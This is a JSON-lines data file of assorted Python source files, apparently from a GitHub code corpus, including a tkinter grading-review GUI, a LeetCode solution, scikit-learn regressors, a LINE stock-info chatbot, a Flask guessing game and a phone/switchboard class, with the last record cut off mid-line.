+{"seq_id":"28438467975","text":"from tkinter import *\nfrom tkinter import ttk\nfrom Resources.cut_paste_rename import list_files\nfrom typing import Dict\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom String_match.partial_ratio import *\n\nsize = '1440x810'\n# display resolution (DPI)\nmy_dpi = 96\n# figure size\nplt.figure(figsize=(480 / my_dpi, 480 / my_dpi), dpi=my_dpi)\nplt.rcParams['font.sans-serif'] = ['SimHei'] # use the SimHei font so Chinese text renders\nplt.rcParams['axes.unicode_minus'] = False # render the minus sign correctly\n\nnoData = '暂无数据!' # \"no data yet\" -- value kept verbatim: it is persisted in manual inspection.json\nyesStr = '已判为面向用例' # \"judged as test-case oriented\"\nnoStr = '已判为正常作答' # \"judged as a normal answer\"\n\n\ndef getColor(string):\n if string is None:\n return 'b'\n elif string == noStr:\n return 'g'\n elif string == yesStr:\n return 'r'\n else:\n return 'b'\n\n\nclass users:\n if_else_dict: dict\n partial_ratioDict: Dict[str, Partial_ratio]\n partial_ratio: Partial_ratio\n jsonParser: JsonParser\n manualDict: dict\n\n def __init__(self, path, jsonParser, ifelseDict):\n self.root = Tk()\n self.jsonParser = jsonParser\n self.panedWindow = PanedWindow(self.root)\n self.panedWindow.pack(side='left')\n # the panel on the left\n\n self.partial_ratio = Partial_ratio('', jsonParser)\n self.basePATH = path\n self.root.title(path)\n self.root.geometry(size)\n\n self.if_else_dict = ifelseDict\n\n with open(self.basePATH + '\\\\manual inspection.json', 'r+', encoding='utf8') as ff:\n if ff.read() == '':\n ff.write('{}')\n\n self.manualDict = eval(open(path + '\\\\manual inspection.json', encoding='utf8').read())\n\n self.chartButton = ttk.Button(self.panedWindow, text='show chart', command=self.showStringMatchChart)\n self.chartButton.pack()\n\n self.ifelseChartButton = ttk.Button(self.panedWindow, text='if else', command=self.showIfElseChart)\n self.ifelseChartButton.pack()\n\n self.redShowButton = ttk.Button(self.panedWindow, text='标记可疑字符', command=self.refreshTextColor,\n state='disabled')\n self.redShowButton.pack()\n\n self.yes_no_Button = ttk.Button(self.panedWindow, text=noData, command=self.changeCommentStateByMouse,\n state='disabled')\n self.yes_no_Button.pack()\n self.yes_no_Button.bind_all('<m>', self.changeCommentStateByKeyBoard)\n self.yes_no_Button.bind_all('<n>', self.changeCommentStateByKeyBoard)\n\n self.extractButton = ttk.Button(self.panedWindow, text='数据提取', command=self.extractAction, state='disabled')\n self.extractButton.pack()\n\n self.userListBox = Listbox(self.panedWindow, width=18, height=30)\n self.userPathList = [item for item in list_files(path)\n if item.endswith(\".py\") and not item.endswith('answer.py')]\n [self.userListBox.insert(self.userListBox.size(), str(item).split('\\\\')[3][5:-3])\n for item in self.userPathList]\n self.userListBox.bind('<<ListboxSelect>>', self.userCallOn)\n self.userListBox.pack()\n self.true_answer_button = ttk.Button(self.panedWindow, text='answer', command=self.answerAction)\n self.true_answer_button.pack()\n self.readmeButton = ttk.Button(self.panedWindow, text='readme', command=self.readmeAction)\n self.readmeButton.pack()\n self.test_case_button = ttk.Button(self.panedWindow, text='test-cases', command=self.testCaseAction)\n self.test_case_button.pack()\n self.textView = Text(self.root, width=150, height=54, state='disabled')\n self.textView.pack()\n\n self.partial_ratioDict = self.__initRatioDict()\n\n def __initRatioDict(self):\n result = dict()\n for path in self.userPathList:\n print(path)\n code = open(path, encoding='utf8').read()\n partial_ratio = Partial_ratio(code=code, jsonParser=self.jsonParser)\n result[path] = partial_ratio\n return result\n\n def refreshTextByFile(self, file):\n path = self.basePATH + '\\\\' + file\n self.refreshTextByPath(path)\n pass\n\n def refreshTextByPath(self, path):\n textStr = open(path, encoding='utf8').read()\n self.refreshTextByString(textStr)\n pass\n\n def refreshTextByString(self, string):\n self.textView.configure(state='normal')\n self.textView.delete(0.0, END)\n self.textView.insert(0.0, string)\n self.textView.configure(state='disabled')\n pass\n\n def refreshTextColor(self):\n color = 'red' # red font\n aList = self.partial_ratio.inData[1] # indices of the input data\n bList = self.partial_ratio.outData[1] # indices of the output data\n aList += bList\n aList.sort(key=lambda x: x[0])\n targetLines = list(set([i[0] for i in aList]))\n\n print('suspicious substring indices =', aList)\n text_content = (self.textView.get(\"0.0\", \"end\"))\n # print(text_content)\n text_content_list = text_content.split('\\n')\n print(text_content_list)\n print('=' * 6766)\n ptrINput = 0\n ptrOutput = 0\n for i in range(len(text_content_list)):\n if i + 1 in targetLines:\n while ptrINput < len(aList) and aList[ptrINput][0] == i + 1:\n pos = str(i + 1) + '.'\n self.textView.tag_add('tag', pos + str(aList[ptrINput][1]), pos + str(aList[ptrINput][2]))\n self.textView.tag_config('tag', background='yellow', foreground=color)\n self.textView.insert(pos + str(aList[ptrINput][1]), text_content_list[i] + '\\n', 'tag')\n ptrINput += 1\n else:\n pos = str(i + 1) + '.0'\n self.textView.insert(pos, text_content_list[i] + '\\n', 'tag')\n\n # print(self.textView.get(\"0.0\", \"end\"))\n\n def readUserYN(self):\n a = self.userPathList[self.userListBox.curselection()[0]]\n result = self.manualDict.get(a)\n if result is None:\n return noData\n else:\n return result\n\n def changeCommentStateByMouse(self):\n oldString = self.yes_no_Button['text']\n if oldString == noData or oldString == noStr:\n newString = yesStr\n else:\n newString = noStr\n\n self.yes_no_Button['text'] = newString\n self.writeUserYN(newString)\n\n def changeCommentStateByKeyBoard(self, event):\n if str(self.yes_no_Button['state']) == 'disabled':\n return\n\n newString = noData\n if event.char == 'm':\n newString = yesStr\n elif 
event.char == 'n':\n newString = noStr\n\n self.yes_no_Button['text'] = newString\n self.writeUserYN(newString)\n\n def writeUserYN(self, newString):\n a = self.userPathList[self.userListBox.curselection()[0]]\n self.manualDict[a] = newString\n\n with open(self.basePATH + '\\\\manual inspection.json', 'w', encoding='utf8') as ff:\n ff.write(str(self.manualDict))\n\n def gotoUserState(self):\n self.redShowButton.configure(state='normal')\n self.extractButton.configure(state='normal')\n self.yes_no_Button.configure(state='normal')\n\n def exitUserState(self):\n self.redShowButton.configure(state='disabled')\n self.extractButton.configure(state='disabled')\n self.yes_no_Button.configure(state='disabled')\n\n def userCallOn(self, event):\n my_path = self.userPathList[self.userListBox.curselection()[0]]\n code = open(my_path, encoding='utf8').read()\n self.partial_ratio = self.partial_ratioDict.get(my_path)\n self.refreshTextByString(code)\n self.gotoUserState()\n self.yes_no_Button['text'] = self.readUserYN()\n pass\n\n def answerAction(self, ):\n self.refreshTextByFile('answer.py')\n self.exitUserState()\n pass\n\n def readmeAction(self):\n self.refreshTextByFile('readme.md')\n self.exitUserState()\n pass\n\n def testCaseAction(self):\n self.refreshTextByFile('testCases.json')\n self.exitUserState()\n pass\n\n def extractAction(self):\n self.refreshTextByString(self.partial_ratio.extracter.afterExtractCode)\n pass\n\n @staticmethod\n def showChart(height, bars, colorList):\n height = [i if i > 0 else float(0.0267) for i in height]\n y_pos = np.arange(len(bars))\n plt.ylim((0, 1))\n plt.bar(y_pos, height, color=colorList)\n plt.xticks(y_pos, bars, rotation=270)\n plt.show()\n\n def showStringMatchChart(self):\n # height\n keys = [i for i in self.partial_ratioDict.keys()]\n keys.sort(key=lambda i: (self.partial_ratioDict.get(i).inData[0]*self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[0]*self.partial_ratioDict.get(i).outData[2])/(self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[2]))\n\n height = [(self.partial_ratioDict.get(i).inData[0]*self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[0]*self.partial_ratioDict.get(i).outData[2])/(self.partial_ratioDict.get(i).inData[2]+self.partial_ratioDict.get(i).outData[2]) for i in keys]\n\n bars = [(i.split('\\\\')[-1]).split('_')[1] for i in keys]\n\n colorList = [getColor(self.manualDict.get(i)) for i in keys]\n self.showChart(height, bars, colorList)\n\n def showIfElseChart(self):\n if not self.if_else_dict:\n return\n keys = [i for i in self.if_else_dict.keys()]\n keys.sort(key=lambda i: self.if_else_dict.get(i)[0])\n height = [float(self.if_else_dict.get(i)[0]) for i in keys]\n bars = keys\n\n tmpDict = dict()\n for i in self.manualDict.keys():\n ii = i.split('\\\\')[3].split('_')[1]\n tmpDict[ii] = i\n colorList = [getColor(self.manualDict.get(tmpDict.get(i))) for i in keys]\n self.showChart(height, bars, colorList)\n","repo_name":"huangmengbin/UserCase-Oriented-Detection","sub_path":"gui/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28502995521","text":"# 973. K Closest Points to Origin\n\n# We have a list of points on the plane. Find the K closest points to\n# the origin (0, 0).\n\n# (Here, the distance between two points on a plane is the Euclidean\n# distance.)\n\n# You may return the answer in any order. 
The answer is guaranteed to\n# be unique (except for the order that it is in.)\n\n# Example 1:\n# Input: points = [[1,3],[-2,2]], K = 1\n# Output: [[-2,2]]\n# Explanation:\n# The distance between (1, 3) and the origin is sqrt(10).\n# The distance between (-2, 2) and the origin is sqrt(8).\n# Since sqrt(8) < sqrt(10), (-2, 2) is closer to the origin.\n# We only want the closest K = 1 points from the origin, so the answer is just [[-2,2]].\n\n# Example 2:\n# Input: points = [[3,3],[5,-1],[-2,4]], K = 2\n# Output: [[3,3],[-2,4]]\n# (The answer [[-2,4],[3,3]] would also be accepted.)\n\n# Note:\n# 1 <= K <= points.length <= 10000\n# -10000 < points[i][0] < 10000\n# -10000 < points[i][1] < 10000\n\nfrom typing import List\n\n\nclass Solution:\n def calcDistances(self, points):\n import math\n res = []\n for x, y in points: res.append([math.sqrt(x**2 + y**2), x, y])\n return res\n\n def randomize(self, points):\n import random\n for i in range(len(points) - 1, 0, -1):\n r = int(random.random() * i)\n points[i], points[r] = points[r], points[i]\n return points\n\n def partition(self, points, start, end):\n pv = points[start][0]\n points[start], points[end] = points[end], points[start]\n p = start\n for i in range(start, end):\n if points[i][0] < pv:\n points[p], points[i] = points[i], points[p]\n p += 1\n points[p], points[end] = points[end], points[p]\n return p\n\n def kClosest(self, points: List[List[int]], K: int) -> List[List[int]]:\n if K >= len(points): return points\n pd = self.randomize(self.calcDistances(points))\n l, r = 0, len(points) - 1\n p = self.partition(pd, l, r)\n while p != K:\n if p < K: l = p + 1\n else: r = p - 1\n p = self.partition(pd, l, r)\n\n res = []\n for i, p in enumerate(pd):\n if i == K: break\n res.append(p[1:])\n return res\n\nt = Solution()\n\n\nprint(\"[[0,2],[-3,3],[-2,5]] =|= \", t.kClosest([[6,10],[-3,3],[-2,5],[0,2]], 3))\nprint(\"[[-2,2]] =|= \", t.kClosest([[1,3],[-2,2]], 1))\nprint(\"[[3,3],[-2,4]] =|= \", t.kClosest([[3,3],[5,-1],[-2,4]], 2))\nprint(\"[[3,3],[5,-1],[-2,4]] =|= \", t.kClosest([[3,3],[5,-1],[-2,4]], 3))","repo_name":"DmitryVlaznev/leetcode","sub_path":"973-k-closest-points-to-origin.py","file_name":"973-k-closest-points-to-origin.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"18288376877","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 16 17:03:39 2021\n\n@author: bdobkowski\n\"\"\"\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge, RidgeCV\nfrom sklearn.linear_model import Lasso, LassoCV\nfrom sklearn.linear_model import PoissonRegressor\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\n\nclass Regressor:\n \"\"\"Regressor\n\n Example usage:\n > reg = Regressor('LinearReg')\n > reg.fit(x_train, y_train)\n > reg.predict(x_eval)\n \"\"\"\n def __init__(self, model_type='LinearReg'):\n \"\"\"\n\n \"\"\"\n self.model_type = model_type\n \n if model_type == 'LinearReg':\n self.model = LinearRegression(fit_intercept=True)\n elif model_type == 'Ridge':\n self.model = Ridge(fit_intercept=True)\n elif model_type == 'Lasso':\n self.model = Lasso(fit_intercept=True)\n elif model_type == 'SVR':\n self.model = SVR(kernel='poly',\n degree=3,\n gamma='scale',\n epsilon=0.1,\n C=1.0,\n max_iter=1000)\n elif model_type == 'Poisson':\n 
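# Note: PoissonRegressor fits a generalized linear model with a log link and requires non-negative targets (y >= 0).\n # Usage sketch (illustrative): reg = Regressor('Poisson'); reg.fit(x_train, y_train); reg.predict(x_eval)\n 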
self.model = PoissonRegressor(max_iter=10000)\n elif model_type == 'RandomForest':\n self.model = RandomForestRegressor(max_depth=2, random_state=0)\n elif model_type == 'Baseline':\n self.model = LinearRegression(fit_intercept=True)\n else:\n raise Exception('Model does not exist in regressor class')\n\n def fit(self, x, y):\n self.model.fit(x, y)\n \n def predict(self, x):\n return self.model.predict(x)\n \n def fit_cv(self, x, y):\n \"\"\" Cross Validation via GridSearch, RandomizedSearch\n \"\"\"\n if self.model_type == 'LinearReg':\n w = np.exp(-(y-50)**2/1000)\n self.model_cv = self.model\n self.model_cv.fit(x, y, sample_weight=w)\n return\n \n elif self.model_type == 'Baseline':\n self.model_cv = self.model\n self.model_cv.fit(x, y)\n return\n \n elif self.model_type == 'Ridge':\n self.model_cv = RidgeCV(alphas=(np.linspace(0.1,10.0,num=30)),\n fit_intercept=True).fit(x, y)\n \n # self.model_cv = Ridge(alpha=10.0,\n # fit_intercept=True).fit(x, y)\n \n # ['additive_chi1', 'chi2', 'linear', 'poly', 'polynomial', 'rbf', 'laplacian', 'sigmoid', 'cosine']\n # params = {'kernel':['rbf','linear'],\n # 'alpha':np.linspace(0.1,10.0,num=30),\n # 'gamma':[0.1, 0.01, 0.4, 0.7]}\n \n # self.model_cv = GridSearchCV(estimator=KernelRidge(), \n # param_grid=params, \n # scoring='neg_mean_squared_error').fit(x,y)\n return\n \n elif self.model_type == 'Lasso':\n self.model_cv = LassoCV(alphas=(np.linspace(0.01,10.0,num=100)),\n fit_intercept=True).fit(x, y)\n return\n \n elif self.model_type == 'SVR':\n # params = {'kernel':['poly','rbf','linear','sigmoid'],\n # 'C':np.logspace(-2,2,num=40),\n # 'gamma':['scale'],\n # 'max_iter':[-1],\n # 'degree':[1,2,3,4]}\n \n # self.model_cv = GridSearchCV(estimator=self.model, \n # param_grid=params, \n # scoring='neg_mean_squared_error').fit(x,y)\n \n self.model_cv = SVR(C=0.21544346900318834, \n degree=1, \n kernel='linear',\n cache_size=200,\n max_iter=-1,\n epsilon=0.1).fit(x, y)\n return\n \n elif self.model_type == 'Poisson':\n params = {'alpha':np.linspace(0.01,10,100),\n 'max_iter':[100000]}\n \n self.model_cv = GridSearchCV(estimator=self.model, \n param_grid=params, \n scoring='neg_mean_squared_error').fit(x,y)\n return\n \n elif self.model_type == 'RandomForest':\n params = {'bootstrap': [True, False],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'max_features': ['auto', 'sqrt'],\n 'min_samples_leaf': [1, 2, 3, 4],\n 'min_samples_split': [2, 4, 6, 8, 10],\n 'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n \n self.model_cv = RandomizedSearchCV(estimator = self.model, \n param_distributions = params, \n n_iter = 200, \n cv = 3, \n verbose=1, \n random_state=42, \n n_jobs = -1).fit(x,y)\n return\n ","repo_name":"bdobkowski/2020_Olympics_Predictions","sub_path":"regressors.py","file_name":"regressors.py","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39961650474","text":"import os\nimport json\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\n\nimport twstock\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\n\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\n\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\n# LINE Chatbot token\nLINE_CHANNEL_ACCESS_TOKEN = os.environ.get('LINE_CHANNEL_ACCESS_TOKEN')\nLINE_CHANNEL_SECRET = 
os.environ.get('LINE_CHANNEL_SECRET')\nline_bot_api = LineBotApi(LINE_CHANNEL_ACCESS_TOKEN)\nhandler = WebhookHandler(LINE_CHANNEL_SECRET)\n\ndef getStockPrice(stockno):\n stock = twstock.realtime.get(stockno)['realtime']\n stockpricestr = ''\n stockpricestr += '開盤價'+ '{:.2f}'.format(float(stock['open'])) + '\\n'\n stockpricestr += '最高價'+ '{:.2f}'.format(float(stock['high'])) + '\\n'\n stockpricestr += '最低價'+ '{:.2f}'.format(float(stock['low'])) + '\\n'\n stockpricestr += '收盤價'+ '{:.2f}'.format(float(stock['latest_trade_price']))\n return stockpricestr\n\ndef getRevenue(stockno):\n url = f\"http://jsjustweb.jihsun.com.tw/z/zc/zch/zch_{stockno}.djhtm\"\n res = requests.get(url)\n soup = bs(res.text, 'lxml')\n tb = soup.select('table')[2]\n df = pd.read_html(tb.prettify(), header = 5)\n\n stockrevenue = ''\n stockrevenue += '年月 ' + str(df[0].iloc[0, 0]) + '%\\n'\n stockrevenue += '營收 ' + str(df[0].iloc[0, 1]) + '仟元\\n'\n stockrevenue += '月增率 ' + str(df[0].iloc[0, 2]) + '%\\n'\n stockrevenue += '去年同期 ' + str(df[0].iloc[0, 3]) + '仟元\\n'\n stockrevenue += '年增率 ' + str(df[0].iloc[0, 4]) + '%\\n'\n stockrevenue += '累計營收 ' + str(df[0].iloc[0, 5]) + '仟元\\n'\n stockrevenue += '累計營收年增率 ' + str(df[0].iloc[0, 6]) + '%\\n'\n return stockrevenue\n\ndef getCredittransaction(stockno):\n url = f'https://goodinfo.tw/StockInfo/ShowBearishChart.asp?STOCK_ID={stockno}&CHT_CAT=DATE'\n headers = {\n 'referer': 'https://goodinfo.tw/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'\n }\n res = requests.get(url, headers = headers)\n res.encoding = 'utf8'\n soup = bs(res.text, 'lxml')\n cells = soup.select('.solid_1_padding_4_2_tbl td')\n strtext = ''\n strtext += '融資增減 ' + cells[23].text + '\\n'\n strtext += '融資使用率 ' + cells[25].text + '\\n'\n strtext += '融券增減 ' + cells[39].text + '\\n'\n strtext += '融券使用率 ' + cells[41].text + '\\n'\n return strtext\n\ndef getStockDayTrade(stockno):\n url = f'https://goodinfo.tw/StockInfo/DayTrading.asp?STOCK_ID={stockno}'\n headers = {\n 'referer': 'https://goodinfo.tw/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'\n }\n res = requests.get(url, headers = headers)\n res.encoding = 'utf8'\n soup = bs(res.text, 'lxml')\n cells = soup.select('#divDayTradingDetail td')\n strtext = ''\n strtext += '成交張數當沖 ' + cells[25].text + ' %\\n'\n strtext += '當沖總損益(萬元) ' + cells[30].text + '\\n'\n strtext += '當沖均損益(元/張) ' + cells[31].text + '\\n'\n return strtext\n\ndef getOperatingProfit(stockno, year, season):\n url = f'https://mops.twse.com.tw/mops/web/ajax_t163sb06?step=1&firstin=1&&TYPEK=sii&year={year}&season={season}'\n res = requests.get(url)\n soup = bs(res.text, 'lxml')\n tb = soup.select('.hasBorder')[0]\n dfsii = pd.read_html(tb.prettify(), header = 0)[0]\n\n url = f'https://mops.twse.com.tw/mops/web/ajax_t163sb06?step=1&firstin=1&&TYPEK=otc&year={year}&season={season}'\n res = requests.get(url)\n soup = bs(res.text, 'lxml')\n tb = soup.select('.hasBorder')[0]\n dfotc = pd.read_html(tb.prettify(), header = 0)[0]\n\n df = pd.concat([dfsii, dfotc], ignore_index = True)\n df['公司代號'] = df['公司代號'].astype(str)\n strtext = ''\n if len(df[df['公司代號'] == stockno]) > 0:\n index = df[df['公司代號'] == stockno].index[0]\n strtext += '營業收入 (百萬元) ' + str(df.iloc[index, 2]) + '\\n'\n strtext += '毛利率(%) (營業毛利) / (營業收入) ' + str(df.iloc[index, 3]) + '\\n'\n strtext += '營業利益率(%) (營業利益)/ (營業收入) ' + str(df.iloc[index, 4]) + '\\n'\n strtext += '稅前純益率(%) (稅前純益)/ 
(營業收入) ' + str(df.iloc[index, 5]) + '\\n'\n strtext += '稅後純益率(%) (稅後純益)/ (營業收入) ' + str(df.iloc[index, 6]) + '\\n'\n else:\n strtext += f'此檔{stockno}股票尚未公告{year}/{season}的營益分析資料,請重新查詢!!'\n return strtext\n\ndef Help():\n strtext = '''\n 請輸入以下指令查詢:\\n\n 股計查詢:@/[股票代碼]\n ex: @2330\\n\n 營收/[股票代碼]\n ex: 營收/2330\\n\n 資券/[股票代碼]\n ex: 資券/2330\\n\n 現股當沖/[股票代碼]\n ex: 現股當沖/2330\\n\n 營益分析/[股票代碼]/[年度]/[季別]\n ex: 營益分析/2330/109/1\\n\n '''\n return strtext \n\n\n@app.route(\"/\", methods=['GET'])\ndef hello():\n return 'hello heroku'\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n signature = request.headers['X-Line-Signature']\n body = request.get_data(as_text=True)\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n\n return 'OK'\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n user_input = event.message.text\n if user_input == '?' or user_input == 'h':\n helptext = Help()\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=helptext))\n elif user_input[0:1] == '@':\n stockno = user_input[1:].strip()\n stocktext = getStockPrice(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext))\n elif '營收/' in user_input:\n stockno = user_input.split('/')[1]\n stocktext = getRevenue(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext))\n elif '資券/' in user_input:\n stockno = user_input.split('/')[1]\n stocktext = getCredittransaction(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext))\n elif '現股當沖/' in user_input:\n stockno = user_input.split('/')[1]\n stocktext = getStockDayTrade(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext)) \n elif '營益分析/' in user_input:\n stockno = user_input.split('/')[1]\n year = user_input.split('/')[2]\n season = user_input.split('/')[3]\n print(stockno, year, season)\n stocktext = getOperatingProfit(stockno, year, season)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext)) \n else:\n errortext = '輸入指令錯誤,請重新輸入!!!\\n' + Help()\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=errortext)) \n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"white5168/stocklinbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31485637929","text":"from flask import Flask\nimport random\n\napp = Flask(__name__)\n\nrand_num = random.randint(1, 9)\ngif_list = ['https://media.giphy.com/media/xT0xeE8uyMskq0Jg9W/giphy.gif',\n 'https://media.giphy.com/media/RtFxzpt8RxzDqCAgLh/giphy.gif',\n 'https://media.giphy.com/media/cPKtFMVbJhyhO/giphy.gif',\n 'https://media.giphy.com/media/d1E1szXDsHUs3WvK/giphy.gif',\n 'https://media.giphy.com/media/JsyTC1TiBDuYpbj6ZL/giphy.gif',\n 'https://media.giphy.com/media/l0ExncehJzexFpRHq/giphy.gif',\n 'https://media.giphy.com/media/26xBPdoEvUPUHWGE8/giphy.gif']\n\nlast_gif = \"\"\n\ndef make_h1(fn):\n def wrapper(**kwargs):\n for key, value in kwargs.items():\n return f'
<h1>{fn(value)}</h1>'\n return wrapper\n\ndef add_gif(fn):\n def wrapper(*args):\n global last_gif\n new_gif = True\n while new_gif:\n gif = random.choice(gif_list)\n if gif != last_gif:\n new_gif = False\n last_gif = gif\n return f'{fn(args[0])}<img src=\"{gif}\">'\n return wrapper\n\n@app.route('/')\ndef guess_number():\n global last_gif\n gif = random.choice(gif_list)\n last_gif = gif\n\n return f\"<h1>Guess a number between 0 and 9</h1><img src='{gif}'>\"\n\n@app.route('/<int:number>')\n@make_h1\n@add_gif\ndef number_check(number):\n global rand_num\n if number > rand_num:\n return \"Sorry you guessed too high!\"\n elif number < rand_num:\n return \"Sorry you guessed too low!\"\n else:\n return \"Congratulations, you guessed the number!\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"seaniomoran/HigherLower_FlaskGame","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"40333244382","text":"'''\r\nFile: phone.py\r\nAuthor: Gurjinder Singh\r\nDate: 12/4/2020\r\nSection: 53\r\nE-mail: gsingh10@umbc.edu\r\nDescription: class for phone objects\r\n\r\n'''\r\n\"\"\"\r\n Phone Class Starter Code\r\n\r\n This code defines the basic functionality that you need from a phone.\r\n When these functions are called they should communicate with the\r\n switchboards to find a path\r\n\"\"\"\r\n\r\n\r\nclass Phone:\r\n def __init__(self, number, switchboard):\r\n \"\"\"\r\n :param number: the phone number without area code\r\n :param switchboard: the switchboard to which the number is attached.\r\n \"\"\"\r\n self.number = number\r\n self.switchboard = switchboard\r\n self.call = None\r\n self.otherPhone = None\r\n # number is the integer phone number\r\n # switchboard is the switchboard this phone is attached to\r\n # call holds the other phone's switchboard while connected, meant to make the algorithms easier\r\n # otherPhone is the Phone object at the other end of the call\r\n\r\n def connect(self, area_code, other_phone_number):\r\n \"\"\"\r\n :param area_code: the area code of the other phone number\r\n :param other_phone_number: the other phone number without the area code\r\n :return: **this you must decide in your implementation**\r\n \"\"\"\r\n\r\n if self.call != None: #Force closes the current call to make a new call (makes more sense and stops a lot of errors)\r\n print(\"Disconnecting current call to make new call\")\r\n self.disconnect()\r\n\r\n previous_codes = []#recursive function call to locate the other phone\r\n output = self.switchboard.connect_call(area_code, other_phone_number, previous_codes)\r\n if output == None:\r\n print(\"Phone not found\")\r\n else:#swaps data between the 2 phone objects, making each one linked\r\n self.call = output\r\n self.otherPhone = output.findPhone(other_phone_number)\r\n self.otherPhone.call = self.switchboard\r\n self.otherPhone.otherPhone = self\r\n\r\n #output.findPhone(other_phone_number).call = self.switchboard\r\n\r\n #output.findPhone(other_phone_number).otherPhone = self\r\n #print(self.call.area_code)\r\n #print(self.otherPhone.number)\r\n #print(self.otherPhone.call.area_code)\r\n #print(self.otherPhone.otherPhone.number)\r\n return output\r\n\r\n def searchList(self, list, number):#test method\r\n for i in list:\r\n if i.number == number:\r\n print(i.number)\r\n\r\n def display(self, phonenumber):#display\r\n output = \"\"\r\n if self.call == None:\r\n output = (\" Phone with number: \" + str(self.number) + \" is not in use.\")\r\n else:\r\n output = (\" Phone with number: \" + str(self.number) + \" is connected to \" + str(self.call.area_code) + \"-\" + str(self.otherPhone.otherPhone.number))\r\n return output\r\n\r\n def disconnect(self):\r\n \"\"\"\r\n This function should return the connection status to disconnected. 
You need\r\n to use new members of this class to determine how the phone is connected to\r\n the other phone.\r\n\r\n You should also make sure to disconnect the other phone on the other end of the line.\r\n :return: **depends on your implementation**\r\n \"\"\"\r\n if self.call == None:\r\n print(str(self.switchboard.area_code) + \"-\" + str(self.number) + \" is not in a call\")\r\n else:#swaps data for both phones back to None (emulating disconnecting)\r\n print(\"Disconnected (\" + str(self.switchboard.area_code) + \"-\" + str(self.number) + \") and (\" + str(self.call.area_code) + \"-\" + str(self.otherPhone.number) + \")\")\r\n self.otherPhone.call = None\r\n self.otherPhone.otherPhone = None\r\n self.call = None\r\n self.otherPhone = None\r\n\r\n\r\n\r\n","repo_name":"gsingh2124/CMSC-201","sub_path":"Projects/Project3/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4962888911","text":"import numpy as np\r\n\r\n# INT\r\nint_array = np.arange(10)\r\n# array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n\r\nint_array.dtype\r\n# dtype('int32')\r\n\r\n# FLOAT\r\nfloat_array = np.arange(10,dtype='float64')\r\n# array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])\r\n\r\nfloat_array.dtype\r\n# dtype('float64')\r\n\r\n# COMPLEX\r\ncomplex_arr = np.array([1+2j, 2+4j])\r\n# array([1.+2.j, 2.+4.j])\r\n\r\ncomplex_arr.dtype\r\n# dtype('complex128')\r\n\r\n# BOOLEAN\r\nboolean_arr = np.array([True, False, True, False])\r\n\r\nboolean_arr.dtype\r\n# bool\r\n\r\n# for other datatypes refer https://numpy.org/doc/stable/user/basics.types.html","repo_name":"Akshaykumarcp/numpy","sub_path":"0.3_data_types.py","file_name":"0.3_data_types.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8371358404","text":"from PyQt6.QtCore import QObject, pyqtSignal, pyqtBoundSignal\nfrom PyQt6.QtWidgets import QFileDialog, QWidget, QMessageBox\nfrom PyQt6.QtGui import QUndoStack, QUndoCommand\n\nfrom .Relaxation import Relaxation\nfrom .Measurement import Measurement \nfrom .Parameter import Parameter\n\nfrom protocols import SettingsSource, Collection\n\nfrom readers import SettingsReader\n\nfrom pandas import DataFrame, Series, concat # type: ignore\nfrom numpy import ndarray, pi, power, finfo, diag, sum, sqrt, pi, power, linspace, log10, logspace\nfrom numpy import max as 